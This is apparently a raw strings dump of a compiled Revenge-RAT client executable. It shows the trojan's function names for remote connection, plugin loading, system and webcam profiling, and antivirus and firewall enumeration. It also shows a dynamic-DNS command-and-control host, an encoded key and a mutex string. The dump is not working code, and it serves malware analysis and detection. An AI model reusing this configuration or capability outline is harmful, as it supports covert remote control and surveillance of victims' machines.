!This program cannot be run in DOS mode.
`.rsrc
@.reloc
GetType
GetMethod
Invoke
CreateInstance
v2.0.50727
#Strings
<Module>
Client.exe
Program
Client
Lime.Connection
IdGenerator
Lime.Helper
PreventSleep
EXECUTION_STATE
StringConverter
Native
Lime.NativeMethods
PacketHandler
Lime.Packets
Config
Lime.Settings
mscorlib
System
Object
System.Net.Sockets
Socket
client
isConnected
System.IO
MemoryStream
memoryStream
System.Threading
keepAlivePacket
TcpReceive
TcpSend
PacketFixer
SendInfo
GetHardDiskSerialNumber
GetCamera
GetSystem
GetCpu
GetActiveWindow
value__
ES_CONTINUOUS
ES_DISPLAY_REQUIRED
ES_SYSTEM_REQUIRED
StringToBytes
BytestoString
Decompress
Encode
Decode
System.Text
StringBuilder
GetWindowText
capGetDriverDescriptionA
SetThreadExecutionState
Handler
Invoke
GetAssembly
SavePlugin
currentMutex
programMutex
splitter
System.Diagnostics
Stopwatch
stopwatch
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
STAThreadAttribute
EventArgs
<Main>b__0
EventHandler
<>9__CachedAnonymousMethodDelegate1
CompilerGeneratedAttribute
ReleaseMutex
Thread
Environment
System.Windows.Forms
Application
add_ApplicationExit
ThreadStart
Stream
Dispose
Disconnect
AddressFamily
SocketType
ProtocolType
set_SendBufferSize
set_ReceiveBufferSize
Convert
ToInt32
Connect
TimerCallback
SelectMode
get_Available
get_Connected
SocketFlags
Receive
ToArray
String
Contains
ParameterizedThreadStart
get_Length
IDisposable
Collect
WaitForPendingFinalizers
packet
bytesArray
System.Collections.Generic
List`1
Microsoft.VisualBasic
Strings
CompareMethod
Concat
get_MachineName
get_UserName
Microsoft.VisualBasic.Devices
ComputerInfo
get_OSFullName
get_TotalPhysicalMemory
UInt64
System.Globalization
CultureInfo
get_CurrentCulture
get_Name
System.Net
GetHostName
IPHostEntry
GetHostByName
IPAddress
get_AddressList
GetValue
ToString
Interaction
Environ
Conversion
System.Management
ManagementObjectSearcher
ManagementObjectCollection
ManagementObjectEnumerator
GetEnumerator
ManagementBaseObject
get_Current
ManagementObject
get_Item
MoveNext
product
op_Inequality
Microsoft.Win32
Registry
get_Capacity
Encoding
get_Default
GetBytes
GetString
set_Position
System.IO.Compression
GZipStream
CompressionMode
get_UTF8
ToBase64String
FromBase64String
System.Runtime.InteropServices
DllImportAttribute
kernel32
GetVolumeInformationA
MarshalAsAttribute
UnmanagedType
user32
GetForegroundWindow
lpString
avicap32.dll
wDriver
lpszName
cbName
lpszVer
kernel32.dll
esFlags
op_Equality
get_ElapsedMilliseconds
RegistryKey
CurrentUser
OpenSubKey
ToBoolean
<PrivateImplementationDetails>{1A7BEB9F-767F-4703-9C2E-7DA5D8B71A0D}
ValueType
__StaticArrayInitTypeSize=7
$$method0x600001c-1
RuntimeHelpers
RuntimeFieldHandle
InitializeArray
CallType
CallByName
__StaticArrayInitTypeSize=9
$$method0x600001c-2
__StaticArrayInitTypeSize=3
$$method0x600001c-3
__StaticArrayInitTypeSize=6
$$method0x600001c-4
get_ExecutablePath
__StaticArrayInitTypeSize=14
$$method0x600001d-1
__StaticArrayInitTypeSize=5
$$method0x600001d-2
$$method0x600001e-1
AppDomain
get_CurrentDomain
SetValue
.cctor
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
eVTHQGJX
keepAlivePing!
Information
Select * from AntiVirusProduct
SELECT * FROM FirewallProduct
SystemDrive
select * from Win32_Processor
AddressWidth
root\SecurityCenter
displayName
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0
ProcessorNameString
Software\
HKEY_CURRENT_USER\SOFTWARE\
marcelotatuape.ddns.net
TnlhbkNhdFJldmVuZ2U=
2f73f0305bc24
Revenge-RAT
!@#%^NYAN#!@$
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
Client.exe
LegalCopyright
OriginalFilename
Client.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0